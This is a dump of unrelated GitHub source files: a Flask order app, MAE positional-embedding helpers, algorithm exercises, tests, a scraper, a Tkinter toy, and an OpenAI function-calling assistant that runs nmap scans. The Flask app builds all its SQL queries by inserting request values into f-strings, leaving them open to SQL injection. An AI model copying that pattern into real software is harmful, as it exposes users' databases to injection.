values(\"{name}\", \"{gender}\",\"{phone}\", \"{address}\");'\n cursor.execute(query)\n conn.commit()\n elif(action == 'update'):\n query = f\"update Customer set name='{name}', address = '{address}', gender='{gender}' ,phone='{phone}' where custid = {data['custid']};\"\n cursor.execute(query)\n conn.commit()\n print(data)\n return jsonify(data)\n return \"FORBIDDEN\"\n\n@app.route(\"/addorder\", methods =[\"GET\", \"POST\"])\ndef addorder():\n if request.method == \"POST\":\n data = json.loads(request.data)\n custid = data['custid']\n orderitemid = data['orderitemid']\n qtyorderitem = data['qtyorderitem']\n info = checkqty(qtyorderitem, orderitemid)\n print(info)\n if(info[0] > 0):\n d = datetime.datetime.now()\n print(int(qtyorderitem)*info[1])\n datenew = str(d.year)+\"-\"+str(d.month)+\"-\"+str(d.day)\n query = f'insert into Orders(quantity, custid, orderitemid, orderedOn, amount) values({qtyorderitem}, {custid}, {orderitemid},\"{datenew}\", {int(qtyorderitem)*info[1]})'\n cursor.execute(query)\n conn.commit()\n print(\"updated stock \",info)\n query = f'update OrderItem set stock = {info[0]} where orderitemID = {orderitemid}'\n cursor.execute(query)\n conn.commit()\n return jsonify({\"msg\" : \"QE\"}) # query executed\n return jsonify({\"msg\" : \"SE\"}) # stock exceeded\n return \"FORBIDDEN\"\n \n\ndef checkqty(qty,item):\n cursor.execute(f\"select stock, price from OrderItem where orderitemID = {item}\")\n data = cursor.fetchall()\n return [(int(data[0][0]) - int(qty)), int(data[0][1]) ]\n # return True if int(qty) < int(data) else False\n\n\n@app.route('/searchcust', methods =[\"GET\", \"POST\"])\ndef searchcustomer():\n if request.method == \"POST\":\n data = json.loads(request.data)['words']\n cursor.execute(f\"select * from Customer where name like '%{data}%'\")\n data = cursor.fetchall()\n return jsonify({\"msg\" : data})\n\n@app.route('/searchorder', methods =[\"GET\", \"POST\"])\ndef searchorder():\n if request.method == \"POST\":\n data = json.loads(request.data)['words']\n cursor.execute(f\"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID and name like '%{data}%'\")\n data = list(cursor.fetchall())\n data = strdate(data)\n\n return jsonify({\"msg\" : data})\n\n\ndef strdate(data) :\n newlist = []\n for i in data:\n newlist.append(list(i))\n for i in newlist:\n str_ = \"0\" if i[3].month >=1 and i[3].month <=9 else \"\"\n i[3] = str(i[3].year)+\"-\"+str_+str(i[3].month)+\"-\"+str(i[3].day)\n return newlist\n\n@app.route(\"/getpendingntotal\", methods =[\"GET\", \"POST\"])\ndef getpending():\n if request.method == \"POST\":\n data = json.loads(request.data)['whatwewant']\n query = \"\"\n if data == \"Pending\" or data == \"Completed\" : \n query = f'select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID and status = \"{data}\";'\n else :\n query = f'select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID order by orderid;'\n\n cursor.execute(query)\n data = cursor.fetchall()\n data = strdate(data)\n return jsonify({\"msg\" : data})\n\n\n@app.route(\"/orderbyname\", methods =[\"GET\", \"POST\"])\ndef orderbyname():\n if request.method == \"POST\":\n data = json.loads(request.data)\n query = \"\"\n if(data['words'] == 'orderbyname'):\n query = \"select * from Customer order by name\"\n elif(data['words'] == 'orderbyinitially'):\n query = \"select * from Customer\"\n cursor.execute(query)\n data = cursor.fetchall()\n return jsonify({\"msg\" : data})\n\n\n@app.route(\"/orderbydate\", methods =[\"GET\", \"POST\"])\ndef orderbydate():\n if request.method == \"POST\":\n data = json.loads(request.data)\n query = \"\"\n if(data['words'] == \"orderbydate\"):\n query = \"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID order by orderedOn\"\n elif(data['words'] == 'orderbyinitially'):\n query = \"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID\"\n elif(data['words'] == 'orderbynameinorderstable'):\n query = \"select orderid, quantity, OrderItemName, orderedOn, status, name from Customer, OrderItem, Orders where Customer.custid=Orders.custid and Orders.orderitemid = OrderItem.orderitemID order by name\"\n cursor.execute(query)\n data = cursor.fetchall()\n data = strdate(data)\n return jsonify({\"msg\" : data})\n\n\n@app.route(\"/updatecustomer\", methods =[\"GET\", \"POST\"])\ndef updatecust():\n if request.method == \"POST\":\n data = json.loads(request.data)\n\n\n@app.route(\"/getcustbyid\", methods =[\"GET\", \"POST\"])\ndef getcustbyid():\n if request.method == \"POST\":\n data = json.loads(request.data)\n query = f\"select * from Customer where custid={data['id']}\"\n cursor.execute(query)\n data = cursor.fetchall()\n return jsonify({\"msg\" :data})\n\n@app.route(\"/updatependingorder\", methods =[\"GET\", \"POST\"])\ndef updatependingorder():\n if request.method == \"POST\":\n data = json.loads(request.data)\n orderid = data['orderid']\n query = f'update Orders set status=\"Completed\" where orderid = {orderid}'\n cursor.execute(query)\n conn.commit()\n return {\"msg\" : \"updated\"}\n\n\n@app.route(\"/deleteorder\", methods =[\"GET\", \"POST\"])\ndef deleteorder():\n if request.method == \"POST\":\n data = json.loads(request.data)\n orderid = data['orderid']\n print(orderid)\n query = f'delete from Orders where orderid = {orderid}'\n cursor.execute(query)\n conn.commit()\n return {\"msg\" : \"deleted\"}\n\n'''\n\n create table Customer (\n custid int primary key auto_increment,\n name varchar(50) not null,\n gender varchar(1) not null,\n phone varchar(10) not null,\n address varchar(100) not null default \"Pune\"\n );\n\n create table OrderItem (\n orderitemID int primary key auto_increment, \n OrderItemName varchar(50), \n stock int check (stock > 0) ,\n price int\n );\n\n create table Orders( \n orderid int primary key auto_increment, \n quantity int, \n custid int, \n orderitemid int,\n status varchar(30) default \"Pending\", \n orderedOn date, \n amount int, \n foreign key(custid) references Customer(custid),\n foreign key(orderitemid) references OrderItem(orderitemID)\n );\n\n insert into OrderItem(OrderItemName, stock, price) values\n (\"Samsung TV\", 300, 40000), \n (\"Samsung G M30S\", 780, 14500),\n (\"Realme 5G\", 400, 19500),\n (\"Lenovo Ideapad 330\", 170, 42040),\n (\"Xiomi TV\", 900,25000);\n\n'''","repo_name":"parimalmahindrakar/flask","sub_path":"FlaskApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9409821026","text":"# adapted from https://github.com/facebookresearch/mae/blob/main/util/pos_embed.py\nimport logging\nimport math\n\nimport einops\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\n\n# --------------------------------------------------------\n# 2D sine-cosine position embedding\n# References:\n# Transformer: https://github.com/tensorflow/models/blob/master/official/nlp/transformer/model_utils.py\n# MoCo v3: https://github.com/facebookresearch/moco-v3\n# --------------------------------------------------------\ndef get_2d_sincos_pos_embed(embed_dim, h_seqlen, w_seqlen):\n \"\"\"\n grid_size: int of the grid height and width\n return:\n pos_embed: [grid_size*grid_size, embed_dim] or [1+grid_size*grid_size, embed_dim] (w/ or w/o cls_token)\n \"\"\"\n grid_h = np.arange(h_seqlen, dtype=float)\n grid_w = np.arange(w_seqlen, dtype=float)\n grid = np.meshgrid(grid_w, grid_h) # here w goes first\n grid = np.stack(grid, axis=0)\n\n grid = grid.reshape([2, 1, h_seqlen, w_seqlen])\n pos_embed = get_2d_sincos_pos_embed_from_grid(embed_dim, grid)\n return pos_embed\n\n\ndef get_2d_sincos_pos_embed_from_grid(embed_dim, grid):\n assert embed_dim % 2 == 0\n\n # use half of dimensions to encode grid_h\n emb_h = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[0]) # (H*W, D/2)\n emb_w = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[1]) # (H*W, D/2)\n\n emb = np.concatenate([emb_h, emb_w], axis=1) # (H*W, D)\n return emb\n\n\ndef get_1d_sincos_pos_embed_continuous(x, embed_dim: int):\n \"\"\" https://github.com/lucidrains/denoising-diffusion-pytorch/blob/main/denoising_diffusion_pytorch/denoising_diffusion_pytorch.py \"\"\"\n assert x.ndim == 1\n half_dim = embed_dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, device=x.device) * -emb)\n emb = torch.einsum(\"m,d->md\", x, emb)\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\n\ndef get_1d_sincos_pos_embed(embed_dim, seqlen):\n grid = np.arange(seqlen, dtype=float)\n pos_embed = get_1d_sincos_pos_embed_from_grid(embed_dim, grid)\n return pos_embed\n\n\ndef get_1d_sincos_pos_embed_from_grid(embed_dim, pos):\n \"\"\"\n embed_dim: output dimension for each position\n pos: a list of positions to be encoded: size (M,)\n out: (M, D)\n \"\"\"\n assert embed_dim % 2 == 0\n omega = np.arange(embed_dim // 2, dtype=float)\n omega /= embed_dim / 2.\n omega = 1. / 10000 ** omega # (D/2,)\n\n pos = pos.reshape(-1) # (M,)\n out = np.einsum('m,d->md', pos, omega) # (M, D/2), outer product\n\n emb_sin = np.sin(out) # (M, D/2)\n emb_cos = np.cos(out) # (M, D/2)\n\n emb = np.concatenate([emb_sin, emb_cos], axis=1) # (M, D)\n return emb\n\n\n# --------------------------------------------------------\n# Interpolate position embeddings for high-resolution\n# References:\n# DeiT: https://github.com/facebookresearch/deit\n# --------------------------------------------------------\ndef interpolate_pos_embed_permanent(model, old_pos_embed):\n assert model.patch_embed.patch_size[0] == model.patch_embed.patch_size[1], \"only square patchsizes supported\"\n _, img_h, img_w = model.input_shape\n assert img_h == img_w, \"only square patchsizes supported\"\n\n _, old_n_patches, dim = old_pos_embed.shape\n new_n_patches = model.patch_embed.num_patches\n\n old_size = int(old_n_patches ** 0.5)\n new_size = int(new_n_patches ** 0.5)\n\n if old_size == new_size:\n return old_pos_embed\n\n logging.info(f\"position embedding interpolated from {old_size}x{old_size} to {new_size}x{new_size}\")\n # aux_tokens are kept unchanged\n new_pos_embed = F.interpolate(\n einops.rearrange(old_pos_embed, \"1 (h w) dim -> 1 dim h w\", h=old_size, w=old_size),\n size=(new_size, new_size),\n mode='bicubic',\n )\n new_pos_embed = einops.rearrange(new_pos_embed, \"1 dim h w -> 1 (h w) dim\")\n return new_pos_embed\n\n\n# interpolate positional embedding only for the current forward pass\ndef interpolate_pos_embed_temporary(old_pos_embed, old_token_h, old_token_w, new_token_h, new_token_w):\n new_pos_embed = F.interpolate(\n einops.rearrange(old_pos_embed, \"1 (h w) dim -> 1 dim h w\", h=old_token_h, w=old_token_w),\n size=(new_token_h, new_token_w),\n mode='bicubic',\n )\n new_pos_embed = einops.rearrange(new_pos_embed, \"1 dim h w -> 1 (h w) dim\")\n return new_pos_embed\n","repo_name":"ml-jku/MAE-CT","sub_path":"utils/positional_embedding.py","file_name":"positional_embedding.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"76"} +{"seq_id":"72056529846","text":"from collections import Counter\n\nT = int(input())\nfor _ in range(T):\n W = input()\n K = int(input())\n min_ans, max_ans = float('inf'), 0\n str_dict = Counter(W)\n for key, val in str_dict.items():\n if val < K:\n continue\n index = [i for i, c in enumerate(W) if c == key]\n idx_val = [index[i+K-1] - index[i] + 1 for i in range(len(index) + 1 - K)]\n if min(idx_val) < min_ans:\n min_ans = min(idx_val)\n if max(idx_val) > max_ans:\n max_ans = max(idx_val)\n if min_ans == float('inf') and max_ans == 0:\n print(-1)\n else:\n print(min_ans, max_ans)\n","repo_name":"Algorithm-Study/Algorithm","sub_path":"implementation/B20437_이영섭.py","file_name":"B20437_이영섭.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"2019384963","text":"class Solution:\n def isMajorityElement(self, nums: List[int], target: int) -> bool:\n \n array = []\n for num in nums:\n if target == num:\n array.append(num)\n \n if len(array) > len(nums) / 2:\n return True\n else:\n return False\n \n \n","repo_name":"twyunting/Algorithms-LeetCode","sub_path":"Easy/Array/1150. Check If a Number Is Majority Element in a Sorted Array.py","file_name":"1150. Check If a Number Is Majority Element in a Sorted Array.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44728759756","text":"from Figure import Point\n\n\nclass Renderer(object):\n\n def __init__(self, screen_mat):\n \"\"\"\n 注意: transformed()が定義されていないFigureに対してrender_functionを設定することはできない\n \"\"\"\n self.screen_mat = screen_mat\n self.render_functions = {Point: lambda self, p: print(\"rendered: \" + str(p))}\n\n def render(self, figure):\n \"\"\" figureの座標を変換して描画関数に渡す \"\"\"\n if self.render_functions.get(type(figure)):\n # Figure.transformedはここでのみ使われる\n self.render_functions[type(figure)](figure.transformed(figure.mat * self.screen_mat))\n else:\n for sub_figure in figure:\n self.render(sub_figure)\n","repo_name":"yuki67/Figure","sub_path":"Renderer.py","file_name":"Renderer.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32567164841","text":"from authenticator import authenticator, MyAuthenticator\nfrom fastapi.testclient import TestClient\nfrom main import app\nfrom queries.countries import CountryRepository, CountriesOut\nfrom typing import List\n\nclient = TestClient(app)\n\n\nclass MockUpdateCountryRepo(CountryRepository):\n def get_all_countries(self) -> List[CountriesOut]:\n result = [\n {\n \"country_id\": 1,\n \"country_name\": \"Canada\"\n },\n {\n \"country_id\": 2,\n \"country_name\": \"Mexico\"\n },\n {\n \"country_id\": 3,\n \"country_name\": \"USA\"\n },\n {\n \"country_id\": 4,\n \"country_name\": \"France\"\n }\n ]\n\n return result\n\n\nclass MockAuthenticator(MyAuthenticator):\n def try_get_current_account_data(self):\n mock_account_data = {\n \"access_token\": \"mock_access_token\",\n \"type\": \"Bearer\",\n \"user\": \"user\",\n }\n return mock_account_data\n\n\ndef get_fake_account_data():\n return {}\n\n\ndef test_get_all_countries():\n app.dependency_overrides[CountryRepository] = MockUpdateCountryRepo\n current_account_data = authenticator.get_current_account_data\n app.dependency_overrides[current_account_data] = get_fake_account_data\n\n json = [\n {\n \"country_id\": 1,\n \"country_name\": \"Canada\"\n },\n {\n \"country_id\": 2,\n \"country_name\": \"Mexico\"\n },\n {\n \"country_id\": 3,\n \"country_name\": \"USA\"\n },\n {\n \"country_id\": 4,\n \"country_name\": \"France\"\n }\n ]\n\n expected = [\n {\n \"country_id\": 1,\n \"country_name\": \"Canada\"\n },\n {\n \"country_id\": 2,\n \"country_name\": \"Mexico\"\n },\n {\n \"country_id\": 3,\n \"country_name\": \"USA\"\n },\n {\n \"country_id\": 4,\n \"country_name\": \"France\"\n }\n ]\n\n response = client.get(\"/countries/\", json=json)\n print(response.json())\n\n assert response.status_code == 200\n assert response.json() == expected\n","repo_name":"agebrese/voy-amie","sub_path":"api/tests/test_country.py","file_name":"test_country.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10513716321","text":"\"\"\"\n1662. Check If Two String Arrays are Equivalent\nhttps://leetcode.com/problems/check-if-two-string-arrays-are-equivalent/\n\"\"\"\n\n\nclass Solution:\n def arrayStringsAreEqual(self, word1: List[str], word2: List[str]) -> bool:\n word1_str = \"\"\n word2_str = \"\"\n longest_arr = max(len(word1), len(word2))\n for i in range(longest_arr):\n if i < len(word1):\n word1_str += word1[i]\n if i < len(word2):\n word2_str += word2[i]\n return word1_str == word2_str\n","repo_name":"pmbechard/CodingChallenges","sub_path":"LeetCode/Python/easy/check_if_two_string_arrays_are_equivalent_1662.py","file_name":"check_if_two_string_arrays_are_equivalent_1662.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"28764567320","text":"\"\"\"\r\nСортировка выбором / Selection Sort\r\n\r\n1) находим номер минимального значения в текущем списке\r\n2) производим обмен этого значения со значением первой неотсортированной позиции (обмен не нужен,\r\n если минимальный элемент уже находится на данной позиции)\r\n3) теперь сортируем хвост списка, исключив из рассмотрения уже отсортированные элементы\r\n\r\nСложность алгоритма O(N^2), где N - количество элементов.\r\nНеустойчивая сортировка.\r\n\"\"\"\r\n\r\n\r\ndef selection_sort(arr):\r\n for i in range(len(arr)):\r\n idx_min = i\r\n for j in range(i + 1, len(arr)):\r\n if arr[j] < arr[idx_min]:\r\n idx_min = j\r\n arr[idx_min], arr[i] = arr[i], arr[idx_min]\r\n print(arr)\r\n\r\n\r\narray = [8, 9, 4, 1, 0, 3, 7, 6, 2, 5]\r\nselection_sort(array)\r\nprint(array)\r\n\r\n\r\n\r\n#########\r\ndef select_sort(a):\r\n for i in range(len(a)-1):\r\n for k in range(i+1, len(a)):\r\n if a[k] < a[i]:\r\n a[k], a[i] = a[i], a[k]","repo_name":"bostspb/algorithms","sub_path":"implementation/sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10311350244","text":"\"\"\"empty message\n\nRevision ID: 49cc085ef589\nRevises: 92252e237959\nCreate Date: 2019-09-23 10:30:25.926109\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '49cc085ef589'\ndown_revision = '92252e237959'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('admins',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('id')\n )\n op.add_column('users', sa.Column('admin_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'users', 'admins', ['admin_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'users', type_='foreignkey')\n op.drop_column('users', 'admin_id')\n op.drop_table('admins')\n # ### end Alembic commands ###\n","repo_name":"vnyabzya/AdminPanelStopDrugsBot","sub_path":"migrations/versions/49cc085ef589_.py","file_name":"49cc085ef589_.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22409888859","text":"from django.urls import path\nfrom django.views.decorators.cache import cache_page\n\nfrom .views import *\n\nurlpatterns = [\n # path(\"add/\", addNoteView, name='add_note'),\n path(\"\", PointPage.as_view(), name='index'),\n path('category/', PointCategory.as_view(), name='category'),\n path(\"users-points/\", UsersPointPage.as_view(), name='users_points'),\n path(\"new-point/\", CreatePoint.as_view(), name='add_point'),\n path(\"point-info/\", ShowPoint.as_view(), name='point_info'),\n path(\"point/-update\", UpdatePoint.as_view(), name='point_update'),\n path(\"point/-delete\", delete_point, name='point_delete'),\n path(\"about/\", about, name='about'),\n path(\"contact/\", contact, name='contact'),\n # path('map/', location_map, name='location_map'),\n]\n","repo_name":"Agipas/help_map","sub_path":"kartadopomogu/karta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71386418164","text":"from init import session\nimport csv\n\nresponse = session.get(\"https://www.transfermarkt.com.mt/sir-alex-ferguson/eingesetzteSpieler/trainer/4/plus/1?saison_id=&verein_id=985&liga=&wettbewerb_id=GB1\")\n\nwith open(\"most_players_stats.csv\", \"w\", newline=\"\") as file:\n csv_writer = csv.writer(file)\n csv_writer.writerow(['Name', 'Appearances', 'Goals', 'Assists'])\n\nitems = response.html.find(\"table.items\", first=True)\n\nodd_items = items.find(\"tr.odd\")\neven_items = items.find(\"tr.even\")\n\nfor i in range(12):\n odd_item = odd_items[i]\n table_rows = odd_item.find(\"td\")\n odd_name = table_rows[2].find(\"a\", first=True).text\n odd_appearances = table_rows[8].find(\"a\", first=True).text\n odd_goals = table_rows[11].text\n odd_assists = table_rows[12].text\n print(odd_name, odd_appearances, odd_goals, odd_assists)\n\n even_item = even_items[i]\n table_rows = even_item.find(\"td\")\n even_name = table_rows[2].find(\"a\", first=True).text\n even_appearances = table_rows[8].find(\"a\", first=True).text\n even_goals = table_rows[11].text\n even_assists = table_rows[12].text\n print(even_name, even_appearances, even_goals, even_assists)\n\n with open('most_players_stats.csv', 'a+', newline='', encoding=\"utf-8\") as new_file:\n csv_writer = csv.writer(new_file)\n csv_writer.writerow([odd_name, odd_appearances, odd_goals, odd_assists])\n csv_writer.writerow([even_name, even_appearances, even_goals, even_assists])\n\n\n# github.com/arutselvanManivannan\n","repo_name":"ArutselvanManivannan/Web_Scraping_Repo","sub_path":"Requests-Html/Manchester United/Fergie Time/most_players_stats.py","file_name":"most_players_stats.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39516572710","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('instance', '__first__'),\n ('idc', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Volume',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=128, verbose_name='Volume name')),\n ('volume_id', models.CharField(max_length=128, null=True, verbose_name='OS Volume UUID')),\n ('size', models.IntegerField(verbose_name='Volume size')),\n ('volume_type', models.IntegerField(default=0, verbose_name='Volume Type', choices=[(0, 'Capacity'), (1, 'Performance')])),\n ('status', models.IntegerField(default=0, verbose_name='Status', choices=[(0, 'Volume Creating'), (1, 'Volume Attaching'), (2, 'Volume Available'), (3, 'Volume Backing_up'), (4, 'Volume Deleting'), (5, 'Volume Downloading'), (6, 'Volume Error'), (7, 'Volume Error_deleting'), (8, 'Volume Error_restoring'), (9, 'Volume In Use'), (10, 'Volume Restoring_backup'), (12, 'Volume Unrecognized'), (11, 'Volume uploading')])),\n ('create_date', models.DateTimeField(auto_now_add=True, verbose_name='Create Date')),\n ('deleted', models.BooleanField(default=False, verbose_name='Deleted')),\n ('instance', models.ForeignKey(blank=True, to='instance.Instance', null=True)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ('user_data_center', models.ForeignKey(to='idc.UserDataCenter')),\n ],\n options={\n 'ordering': ['-create_date'],\n 'db_table': 'volume',\n 'verbose_name': 'Volume',\n 'verbose_name_plural': 'Volume',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"eoncloud-dev/eonboard","sub_path":"eoncloud_web/biz/volume/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"4114521118","text":"def leiaInt(msg):\n while True:\n try:\n n = int(input(msg))\n return f'{n}'\n except (ValueError, TypeError):\n print ('\\033[01:31mErro! O valor digitado não é válido!\\033[m')\n except (KeyboardInterrupt):\n print ('\\033[01:33mO usuário preferiu não digitar!\\033[m')\n return 0\n\ndef leiaFloat(msg1):\n while True:\n try:\n r = float(input(msg1))\n return f'{r}'\n except (ValueError, TypeError):\n print('\\033[01:31mErro! O valor digitado não é válido!\\033[m')\n except (KeyboardInterrupt):\n print ('\\033[01:33mO usuário preferiu não digitar!\\033[m')\n return 0\n\n\nn = leiaInt('Digite um número inteiro: ')\nr = leiaFloat('Digite um número real: ')\nprint(f'O número inteiro digitado foi o {n} e o real foi o {r}.')\n","repo_name":"mfre1re/Diversas-atividades-em-Python","sub_path":"Atividades - Python/Exerc.073 - Funções e Tratamento de Erros em Python.py","file_name":"Exerc.073 - Funções e Tratamento de Erros em Python.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20472628866","text":"import pygame\n\nWIDTH = 640\nHEIGHT = 480\n\npygame.init()\nwindow = pygame.display.set_mode((WIDTH, HEIGHT))\n\nball = pygame.image.load(\"ball.png\")\nw = ball.get_width()\nh = ball.get_height()\n\nx, velocity_x = w, 2\ny, velocity_y = h, 2\n\nclock = pygame.time.Clock()\n\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n\n window.fill((0, 0, 0))\n window.blit(ball, (x, y))\n pygame.display.flip()\n\n x += velocity_x\n y += velocity_y\n\n if y <= 0:\n velocity_y *= -1\n\n if x <= 0:\n velocity_x *= -1\n\n if y + h >= HEIGHT:\n velocity_y *= -1\n\n if x + w >= WIDTH:\n velocity_x *= -1\n\n clock.tick(60)\n","repo_name":"voizlav/BSCS1002","sub_path":"part13/86_bouncing_ball/bouncing_ball.py","file_name":"bouncing_ball.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35508876213","text":"from typing import List\nfrom collections import deque\n\n\"\"\"\nThere are only to fundamentals data structures. First is Array and second is LinkedList.\n\nLet's talk about LinkedList now.\n\"\"\"\n\nclass ListNode:\n def __init__(self, val: int, next: \"ListNode\" = None):\n self.val = val\n self.next = next\n\ndef listToLinkedList(list: List[int]) -> ListNode:\n def append(node: ListNode, nextVal: int) -> ListNode:\n node.next = ListNode(nextVal)\n return node.next\n list = deque(list)\n head = ListNode(list.popleft())\n current = head\n while list:\n current = append(current, list.popleft())\n return head\n\ndef printLinkedList(head: ListNode):\n current = head\n while current:\n print(current.val)\n current = current.next\n\n\"\"\"\nPreorder LinkedList Traversal\n\"\"\"\n\ndef preorder(head: ListNode):\n if head:\n # do something first on the current node\n print(head.val)\n # then process the rest\n preorder(head.next)\n\n\"\"\"\nPostorder LinkedList Traversal\n\"\"\"\n\ndef postorder(head: ListNode):\n if head:\n # traverse next first till the end\n postorder(head.next)\n # then only process the current node\n print(head.val)\n\nif __name__ == \"__main__\":\n ll = listToLinkedList(list(range(10)))\n # printLinkedList(ll)\n\n preorder(ll)\n postorder(ll)\n\n\n\n\n\n ","repo_name":"lamida/algorithms-drills","sub_path":"traversal/linked_list_traversal.py","file_name":"linked_list_traversal.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44489053855","text":"from tkinter import *\nimport requests\n\nFONT = (\"Ariel\", 20, \"bold\")\n\n\ndef change_quote():\n response = requests.get(url=\"https://api.kanye.rest\")\n response.raise_for_status()\n data = response.json()\n quote = data[\"quote\"]\n canvas.itemconfig(canvas_text, text=quote)\n\n\nwindows = Tk()\nwindows.title(\"Kanye says...\")\nwindows.config(padx=50, pady=50)\n\ncanvas = Canvas(width=300, height=414)\nbackground_img = PhotoImage(file=\"background.png\")\ncanvas.create_image(151.5, 207, image=background_img)\ncanvas_text = canvas.create_text(150, 207, text=\" To know what Kanye says, press on the picture of Kanye 👇\", width=250, font=FONT, fill=\"white\")\ncanvas.grid(row=0, column=0)\n\nkanye_img = PhotoImage(file=\"kanye.png\")\nkanye_button = Button(height=131, width=100, image=kanye_img, highlightthickness=0, command=change_quote)\nkanye_button.grid(row=1, column=0)\nwindows.mainloop()\n","repo_name":"koshtiakanksha/kanye_quotes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"41135616389","text":"import os\nimport sys\npath=os.path.abspath(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, path)\nfrom Utils.Functions import process_file,valid_hash,clean_hash\nfrom PackageControl.PackageController import *\n\ndef generic_process_hash(hash_str):\n hash_str = clean_hash(hash_str)\n if(not valid_hash(hash_str)):\n return None\n if(len(hash_str)==32):\n hash_str=get_file_id(hash_str)\n if(hash_str is not None):\n return process_file(hash_str)\n else :\n return None\n","repo_name":"Stasonhub/codex-backend","sub_path":"src/process_hash.py","file_name":"process_hash.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"31943415714","text":"import os\nfrom fastapi import FastAPI, HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nimport openai\nimport logging\nfrom pydantic import BaseModel\nfrom fastapi.responses import StreamingResponse\nfrom network.network_scanning import network_scan\nfrom network.packet_capture import capture_packets\nfrom network.ping_utils import ping_host\nfrom network.ip_utils import get_own_subnet, get_ip_address\nfrom dotenv import load_dotenv\nfrom time import sleep\nimport json\n\nload_dotenv()\nlogging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s', filename='logs.log')\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\ndef chat_with_openai(messages, model, function_call=\"auto\"):\n signature_network_scan = {\n \"name\": \"network_scan\",\n \"description\": \"Perform a network scan using nmap if the user wants a network scan\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"hosts\": {\n \"type\": \"string\",\n \"description\": \"The host(s) to scan, can be a single IP, a range, or a subnet\"\n },\n \"arguments\": {\n \"type\": \"string\",\n \"description\": \"The arguments to pass to nmap, such as scan type and options available in nmap\"\n },\n \"own_network\": {\n \"type\": \"boolean\",\n \"description\": \"Detect if the user intends to scan their own network, otherwise set this to false\"\n }\n },\n 